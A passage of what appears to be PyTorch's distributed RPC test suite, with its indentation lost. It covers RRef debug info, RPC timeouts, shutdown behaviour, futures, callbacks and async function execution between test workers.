worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
self.assertEqual(
rref2.__str__(),
"UserRRef(RRefId = {0}(created_on={1}, local_id=1), ForkId = {0}(created_on={1}, local_id=2))".format(
id_class, self.rank
),
)
@dist_init
def test_rref_get_future(self):
# Tests that we can obtain the future corresponding to the creation of
# the RRef on remote end
if self.rank == 0:
# Builtin
rref = rpc.remote(worker_name(1), torch.add, args=(1, 1))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# UDF
rref = rpc.remote(worker_name(1), foo_add, args=())
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# Script
rref = rpc.remote(worker_name(1), my_script_func, args=(torch.tensor(1), ))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
@dist_init
def test_rref_context_debug_info(self):
# This test checks local states that are modified by remote workers.
# This means that we would need barrier before and after every check.
# The barrier before the check makes sure that all previous states are
# cleared globally, the barrier after ensures that no following states
# change gets into the current check.
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Check 1: local RRef does not update owners_ map or add a pending user.
#################################################
rref1 = RRef(self.rank)
# don't need a barrier here as local RRef is handled by this thread
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertIn("num_pending_users", info)
# RRef on local value is not added to context until shared across RPC
self.assertEqual(0, int(info["num_owner_rrefs"]))
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after the check 1
dist.barrier()
# Check 2: Sharing RRef as an arg should update owners_ map
###########################################################
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(worker_name(dst_rank), set_global_rref, args=(rref1,))
# barrier before check 2
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(1, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 2
dist.barrier()
# clear states for check 2
rpc.rpc_sync(worker_name(dst_rank), clear_global_rref)
# Wait for owner rref to be cleared.
while int(info["num_owner_rrefs"]) != 0:
info = _rref_context_get_debug_info()
time.sleep(0.1)
dist.barrier()
# Check 3: rpc.remote call should update owners_ map
####################################################
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref3 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref2.to_here()
rref3.to_here()
# barrier before check 3
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(2, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 3
dist.barrier()
@dist_init
def test_disable_gil_profiling(self):
# test that rpc.enable_gil_profiling(false) will result in
# GIL wait time not being recorded.
# GIL profiling should be disabled by default.
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertRaises(KeyError, lambda: info["agent.gil_average_wait_time_us"])
rpc.enable_gil_profiling(True)
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.gil_average_wait_time_us", info)
@dist_init(setup_rpc=False)
def test_local_shutdown(self):
# test that we can start RPC and then immediately locally shutdown
# without sending any messages.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init
def test_debug_info(self):
# only test keys in this test case. Values should be covered by
# individual module debug info tests
import torch.distributed.autograd as dist_autograd
info = _get_debug_info()
rref_info = _rref_context_get_debug_info()
agent_info = rpc.api._get_current_rpc_agent().get_debug_info()
autograd_info = dist_autograd._get_debug_info()
common_keys = rref_info.keys() & agent_info.keys() & autograd_info.keys()
self.assertEqual(0, len(common_keys))
expected = {}
expected.update(rref_info)
expected.update(agent_info)
expected.update(autograd_info)
# NB: Key ordering is only preserved in python 3.6+. So here, we
# manually check keys are equal.
for key in expected.keys():
self.assertIn(key, info.keys())
for key in info.keys():
self.assertIn(key, expected.keys())
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_handle_send_exceptions(self):
# test that if a callee node has gone down, we raise an appropriate
# exception instead of just crashing.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc._set_rpc_timeout(10)
# This barrier is needed to ensure that some workers do not exit before
# others have been brought up.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
if self.rank == 1:
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# allow destination worker to exit without joining
error_str = self.get_shutdown_error_regex()
wait_until_node_failure(dst_rank, error_str)
fut = rpc.rpc_async(dst_worker, torch.add, args=(torch.ones(1), 3))
# Shutdown sequence is not very well defined and as a result
# we can see any of the error messages defined in get_shutdown_error_regex.
with self.assertRaisesRegex(RuntimeError, error_str):
fut.wait()
# exit all workers non-gracefully.
rpc.shutdown(graceful=False)
@dist_init
def test_deadlock(self):
# this test is copied from https://github.com/pytorch/pytorch/issues/45089
if self.rank == 1:
dst1 = worker_name((self.rank + 1) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
rpc.rpc_async(dst1, RpcTest._slow_add, args=(x, y), timeout=15).wait()
dist_initialized = dist.is_initialized()
if not dist_initialized:
dist.init_process_group(
backend="gloo",
init_method=self.file_init_method,
rank=self.rank,
world_size=self.world_size,
)
@dist_init(setup_rpc=False)
def test_local_shutdown_with_rpc(self):
# test that we can start RPC, send RPCs, and then run local shutdown.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# A barrier is needed to ensure that all RPCs are processed.
# Otherwise, some RPCs can timeout since the receiving end
# has terminated.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init(setup_rpc=False)
def test_set_and_get_default_rpc_timeout(self):
timeout = 0.5
# A new `RpcBackendOptions` is constructed
# when accessing `self.rpc_backend_options`.
rpc_backend_options = self.rpc_backend_options
rpc_backend_options.rpc_timeout = timeout
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
set_timeout = rpc.get_rpc_timeout()
self.assertEqual(timeout, set_timeout)
rpc.shutdown()
@dist_init
def test_default_timeout_used(self):
"""
Tests that if no timeout is passed into rpc_async and rpc_sync, then the
default timeout is used.
"""
dst_rank = (self.rank + 1) % self.world_size
rpc._set_rpc_timeout(0.001) # 1 ms
# futures should time out and be marked with an exception indicating it as such.
futs = [
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=())
for _ in range(10)
]
expected_error = self.get_timeout_error_regex()
for fut in futs:
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# ensure that if a new timeout is set old futures don't time out but new ones do.
rpc._set_rpc_timeout(200) # 200 seconds
# create a longstanding RPC.
fut1 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
# now, set a short timeout.
rpc._set_rpc_timeout(0.001)
# fut2 should time out, fut1 should not.
fut2 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut2.wait()
fut1.wait()
# Zero timeout means infinity, so future should run to completion.
rpc._set_rpc_timeout(0)
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=()).wait()
# reset to default timeout so shutdown messages can process cleanly.
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init
def test_rpc_timeouts(self):
# TODO: enable timeouts for rpc.remote/RRef (https://github.com/pytorch/pytorch/issues/33803)
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
timeout = 0.1 # 100 ms
expected_error = self.get_timeout_error_regex()
# Test async UDF
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if there is no timeout and we use the default
# RPC timeout.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,)).wait()
# Test sync UDF
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
# Ensure run to completion if there is no timeout and we use the default
# RPC timeout.
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# If we set a default timeout for RPCs, it should be respected, though
# still overridden if we pass in a different timeout to the APIs.
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# The RPCs should run to completion since we override the timeout.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=5).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=5)
# Passing in a zero timeout should ensure that the RPC won't time out.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=0).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=0)
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
def test_dist_init_decorator(self):
@dist_init(setup_rpc=False)
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
@dist_init
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
def test_use_rpc_pickler(self):
class TestPickler:
pass
test_pickler = TestPickler()
with _use_rpc_pickler(test_pickler):
self.assertTrue(torch.distributed.rpc.api._default_pickler is test_pickler)
self.assertTrue(
torch.distributed.rpc.api._default_pickler is _internal_rpc_pickler
)
@dist_init
def test_wait_all(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, (torch.ones(2, 2), 1))
self.assertTrue(len(_thread_local_var.future_list) == 1)
self.assertTrue(isinstance(_thread_local_var.future_list[0], torch._C.Future))
self.assertTrue(fut.done())
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_multiple_call(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
for i in range(20):
fut = rpc.rpc_async(dst, torch.add, (torch.ones(i, i), 1))
res = rpc.rpc_sync(dst, torch.add, (torch.ones(i, i), 1))
self.assertEqual(res, torch.ones(i, i) + 1)
self.assertEqual(fut.wait(), torch.ones(i, i) + 1)
self.assertTrue(len(_thread_local_var.future_list) == 20)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_timeout(self):
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
timeout = 0.1 # 100 ms
fut = rpc.rpc_async(dst, my_sleep_func, args=(1,), timeout=timeout)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_user_func(self):
with self.assertRaises(ValueError):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_body(self):
with self.assertRaises(ValueError):
with _wait_all():
raise_func()
self.assertFalse(hasattr(_thread_local_var, "future_list"))
timed_out_rpc_event = None
@staticmethod
def timed_out_rpc():
RpcTest.timed_out_rpc_event.wait()
@dist_init
def test_wait_all_exit_early_python(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, raise_func)
fut3 = rpc.rpc_async(dst, raise_func)
# We should receive the error from fut2
with self.assertRaisesRegex(ValueError, expected_err):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_wait_all_exit_early_builtin(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
fut3 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
# We should receive the error from fut2
with self.assertRaisesRegex(RuntimeError, "size of tensor"):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_wait_all_exit_early_script_function(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
fut3 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
# We should receive the error from fut2
with self.assertRaisesRegex(RuntimeError, expected_err):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_function_not_on_callee(self):
# test that if a function does not exist on a callee, we don't crash,
# instead we get an AttributeError indicating that the func does not exist.
this_module = sys.modules[__name__]
caller_worker = "worker0"
callee_worker = "worker1"
if self.rank == 1:
# Use delattr to remove the binding of a func on this nodes
delattr(this_module, "foo_add")
# notify remote end that we have removed it.
rpc.rpc_sync(caller_worker, set_value, args=(self.rank,))
if self.rank == 0:
# func exists on caller, but not callee.
# wait for remote end to remove the binding of foo_add func.
wait_for_value_future()
# Ensure that we have the attribute on this module. Otherwise, the test could fail due to a caller-side pickling error.
self.assertTrue(hasattr(this_module, "foo_add"))
with self.assertRaisesRegex(
RuntimeError, "RPC pickler does not serialize"
):
rpc.rpc_sync(callee_worker, foo_add, args=())
@dist_init
def test_non_garbage_collected_user_rref_due_to_local_circular_dependency(self):
dst_worker_name = worker_name((self.rank + 1) % self.world_size)
a = MyClass(1)
b = MyClass(2)
# This is to make Python not garbage collect a and b.
a.other = b
b.other = a
n = self.rank
a.rref = rpc.remote(
dst_worker_name,
torch.add,
args=(torch.ones(n, n), 2)
)
@dist_init(setup_rpc=False)
def test_use_rref_after_shutdown(self):
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# pass in graceful=True to ensure that local UserRRefs are deleted.
rpc.shutdown(graceful=True)
with self.assertRaisesRegex(
RuntimeError, "Cannot call to_here\\(\\) on it after deletion."
):
rref.to_here()
with self.assertRaisesRegex(
RuntimeError, "Cannot call fork an UserRRef after deletion."
):
import torch.distributed.rpc.internal as internal
internal.serialize(rref)
@staticmethod
def _return_gpu_tensor():
return torch.rand(3, 3).cuda(0)
@staticmethod
def _return_gpu_tensor_list():
return [torch.rand(3, 3).cuda(0), torch.rand(3, 3).cuda(1)]
@staticmethod
def _gpu_tensor_list_arg(tensor_list):
return torch.rand(3, 3)
def _create_rref(self):
owner_rank = (self.rank + 2) % self.world_size
return rpc.remote(
worker_name(owner_rank),
torch.add,
args=(torch.zeros(2, 2), 1)
)
@dist_init
def test_user_rrefs_confirmed(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret = rpc.rpc_sync(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret, True)
@dist_init
def test_user_rrefs_confirmed_remote(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret_rref = rpc.remote(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret_rref.to_here(), True)
@dist_init
def test_rref_py_pickle_not_supported(self):
local_rref = RRef(35)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, "Can not pickle rref in python pickler"):
torch.save(local_rref, fname)
@dist_init
def test_remote_throw(self):
rref = rpc.remote(worker_name((self.rank + 1) % self.world_size),
raise_or_inc,
args=(torch.ones(2),))
with self.assertRaisesRegex(Exception, ".*Expected error.*"):
rref.to_here()
@dist_init
def test_non_cont_tensors(self):
if self.rank == 0:
# Create a non-contiguous tensor.
t = torch.rand(5, 5)
t_view = t.narrow(1, 2, 2)
self.assertFalse(t_view.is_contiguous())
t_cont = t_view.contiguous()
self.assertTrue(t_cont.is_contiguous())
self.assertEqual(t_view, t_cont)
# Send non-cont tensor over RPC.
next_rank = (self.rank + 1) % self.world_size
t_ret = rpc.rpc_sync(worker_name(next_rank), non_cont_test, args=(t_view, t_cont))
# Verify the returned tensor.
self.assertEqual(t_view, t_ret)
self.assertFalse(t_ret.is_contiguous())
@dist_init
def test_callback_simple(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
def callback(fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
set_by_cb.set_result(ret.clone() + 1)
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
self.assertEqual(set_by_cb.result(), torch.ones(n, n) * 2 + 1)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_wrong_arg_num(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_fut = fut.then(my_function)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
with self.assertRaisesRegex(
RuntimeError,
"my\\_function\\(\\) missing 2 required positional arguments"
):
cb_fut.wait()
@dist_init
def test_callback_wrong_arg_type(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut0 = rpc.rpc_async(dst, torch.add, args=(torch.ones(2, 2), 1))
fut1 = fut0.then(lambda x: x + 1)
with self.assertRaisesRegex(
RuntimeError,
"unsupported operand type\\(s\\) for \\+"
):
fut1.wait()
@dist_init
def test_callback_multi(self):
num_cbs = 10
n = self.rank + 1
def callback(idx, fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
return ret + idx
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_futs = []
for idx in range(num_cbs):
cb_futs.append(fut.then(partial(callback, idx)))
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
for idx in range(num_cbs):
self.assertEqual(
cb_futs[idx].wait(),
torch.ones(n, n) * 2 + idx
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_chain(self):
n = self.rank + 1
dst = worker_name(n % self.world_size)
def callback(fut):
return fut.wait() + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), 1)
)
num_cbs = 20
for _ in range(num_cbs):
fut = fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) + 1 + num_cbs)
@dist_init
def test_callback_in_rpc(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
add_use_future_cb,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_callback_with_ret(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
fut2 = rpc.rpc_async(
dst,
torch.add,
args=(fut0.wait(), 1)
).then(lambda fut1: fut1.wait() + 1)
return fut2.wait()
fut3 = rpc.rpc_async(
dst,
torch.add,
args=(torch.ones(2, 2), 1)
).then(callback)
self.assertEqual(fut3.wait(), torch.ones(2, 2) + 3)
@dist_init
def test_callback_with_error(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
with self.assertRaisesRegex(ValueError, "Expected error"):
fut0.wait()
raise RuntimeError("Another expected error")
fut1 = rpc.rpc_async(dst, raise_func).then(callback)
with self.assertRaisesRegex(RuntimeError, "Another expected error"):
fut1.wait()
@dist_init
def test_callback_none(self):
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
TypeError,
"incompatible function arguments."
):
rpc.rpc_async(dst, raise_func).then(None)
@dist_init
def test_add_done_callback(self):
set_by_cb = False
n = self.rank + 1
def callback(fut):
nonlocal set_by_cb
fut.wait()
set_by_cb = True
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.add_done_callback(callback)
fut_then = fut.then(lambda _: True)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
# We have no guarantee that the add_done_callback fn will execute before the test finishes.
# Adding a 'then' callback that runs afterwards to guarantee we wait for the first callback
fut_then.wait()
self.assertTrue(set_by_cb)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_mark_future_twice(self):
fut = rpc.rpc_async(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.zeros(2, 2), 1)
)
self.assertEqual(fut.wait(), torch.zeros(2, 2) + 1)
with self.assertRaisesRegex(
RuntimeError,
"Future can only be marked completed once"
):
fut.set_result(1)
@dist_init
def test_pickle_future(self):
fut = torch.futures.Future()
errMsg = "Can not pickle torch.futures.Future"
dst = worker_name((self.rank + 1) % self.world_size)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_sync(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_async(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.remote(dst, fail_on_fut, args=(fut,))
@dist_init
def test_future_done(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, args=(torch.zeros(2), 1))
fut.wait()
self.assertTrue(fut.done())
@dist_init
def test_future_done_exception(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
self.assertTrue(fut.done())
def _test_future_cb(self, func):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
func,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_future_in_rpc(self):
self._test_future_cb(add_use_future_set_result)
@dist_init
def test_future_nested_callback(self):
self._test_future_cb(add_use_future_nested_cb)
def _run_func_in_mode(self, to, fn, mode, args=None, kwargs=None):
if mode == RPCExecMode.SYNC:
return rpc.rpc_sync(to, fn, args=args, kwargs=kwargs)
elif mode == RPCExecMode.ASYNC:
return rpc.rpc_async(to, fn, args=args, kwargs=kwargs).wait()
elif mode == RPCExecMode.REMOTE:
return rpc.remote(to, fn, args=args, kwargs=kwargs).to_here()
def _test_async_function_raise(self, mode):
with self.assertRaisesRegex(RuntimeError, "Expected error"):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_raise_func,
mode
)
@dist_init
def test_async_function_raise(self):
self._test_async_function_raise(RPCExecMode.SYNC)
@dist_init
def test_async_function_raise_async(self):
self._test_async_function_raise(RPCExecMode.ASYNC)
@dist_init
def test_async_function_raise_remote(self):
self._test_async_function_raise(RPCExecMode.REMOTE)
def _test_async_function_wrong_return_type(self, mode):
errMsg = (
"Functions decorated with @rpc\\.async_function must return a "
"torch\\.futures\\.Future object,"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_wrong_type,
mode
)
@dist_init
def test_async_function_wrong_return_type(self):
self._test_async_function_wrong_return_type(RPCExecMode.SYNC)
@dist_init
def test_async_function_wrong_return_type_async(self):
self._test_async_function_wrong_return_type(RPCExecMode.ASYNC)
@dist_init
def test_async_function_wrong_return_type_remote(self):
self._test_async_function_wrong_return_type(RPCExecMode.REMOTE)
@dist_init
def test_async_function_simple(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(dst1, async_add, args=(dst2, torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
def _test_async_function(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
args = (dst2, torch.ones(2, 2), 1, 2)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + 3)
@dist_init
def test_async_function_with_future_ctor(self):
self._test_async_function(async_add_with_future_ctor)
@dist_init
def test_async_function_with_future_ctor_remote(self):
self._test_async_function(
async_add_with_future_ctor,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_chained(self):
self._test_async_function(async_add_chained)
@dist_init
def test_async_function_chained_remote(self):
self._test_async_function(async_add_chained, RPCExecMode.REMOTE)
@dist_init
def test_async_function_nested(self):
self._test_async_function(async_add_nested)
@dist_init
def test_async_function_nested_remote(self):
self._test_async_function(async_add_nested, RPCExecMode.REMOTE)
@dist_init
def test_async_static_method(self):
self._test_async_function(AsyncExecutionClass.static_async_add)
@dist_init
def test_async_static_method_remote(self):
self._test_async_function(
AsyncExecutionClass.static_async_add,
RPCExecMode.REMOTE
)
@dist_init
def test_async_class_method(self):
self._test_async_function(AsyncExecutionClass.class_async_add)
@dist_init
def test_async_class_method_remote(self):
self._test_async_function(
AsyncExecutionClass.class_async_add,
RPCExecMode.REMOTE
)
def _test_test_async_class_rref_proxy(self, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
rref = rpc.remote(dst1, AsyncExecutionClass)
x = torch.ones(2, 2)
y = torch.ones(2, 2) + 1
if mode == RPCExecMode.SYNC:
ret = rref.rpc_sync().static_async_add(dst2, x, x, y)
ret += rref.rpc_sync().class_async_add(dst2, x, x, y)
ret += rref.rpc_sync().bound_async_add(dst2, x, x, y)
elif mode == RPCExecMode.ASYNC:
ret = rref.rpc_async().static_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().class_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().bound_async_add(dst2, x, x, y).wait()
elif mode == RPCExecMode.REMOTE:
ret = rref.remote().static_async_add(dst2, x, x, y).to_here()
ret += rref.remote().class_async_add(dst2, x, x, y).to_here()
ret += rref.remote().bound_async_add(dst2, x, x, y).to_here()
self.assertEqual(ret, 3 * 4 * x)
@dist_init
def test_async_class_rref_proxy(self):
self._test_test_async_class_rref_proxy()
@dist_init
def test_async_class_rref_proxy_async(self):
self._test_test_async_class_rref_proxy(mode=RPCExecMode.ASYNC)
@dist_init
def test_async_class_rref_proxy_remote(self):
self._test_test_async_class_rref_proxy(mode=RPCExecMode.REMOTE)
def _test_async_function_multi(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
num = 20
step = 3
args = (dst2, torch.ones(2, 2), num, step)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + num * step)
@dist_init
def test_async_function_multi_chained(self):
self._test_async_function_multi(async_add_chained_multi)
@dist_init
def test_async_function_multi_chained_async(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_chained_remote(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_multi_fanout(self):
self._test_async_function_multi(async_add_multi_fanout)
@dist_init
def test_async_function_multi_fanout_async(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_fanout_remote(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.REMOTE
)
def _test_return_future(self, mode):
with self.assertRaisesRegex(
RuntimeError,
